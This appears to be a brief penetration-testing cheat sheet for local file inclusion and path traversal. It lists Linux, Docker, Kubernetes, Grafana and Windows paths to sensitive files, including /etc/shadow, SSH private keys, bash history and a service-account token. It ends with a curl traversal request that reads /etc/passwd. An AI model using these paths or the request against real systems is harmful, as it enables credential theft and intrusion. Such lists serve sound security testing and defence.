Wordlists

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt

Linux

/etc/passwd
/home/$USER/.ssh/id_rsa
/home/$USER/.ssh/authorized_keys
/home/$USER/.bash_history
/etc/shadow
/etc/ssh/sshd_config
/proc/self/environ
/proc/self/cmdline
/proc/net/tcp
/proc/net/fib_trie
/etc/hostname
/etc/hosts
/etc/issue
/var/log/apache2/access.log
/var/log/nginx/access.log

# Docker
/proc/self/cgroup
# Kubernetes
/var/run/secrets/kubenetes.io/serviceaccount/token
# Grafana
/etc/grafana/grafana.ini
C:\\Program Files\\GrafanaLabs\\grafana\\conf\\grafana.ini

Windows

C:\\Windows\\win.ini
C:\\Windows\\System32\\drivers\\etc\\hosts
C:\\Users\\$USER\\.ssh\\id_rsa
C:\\Windows\\Panther\\Unattend.xml

Examples

curl <http://$IP:3000/../../../../../../../../etc/passwd> --path-as-is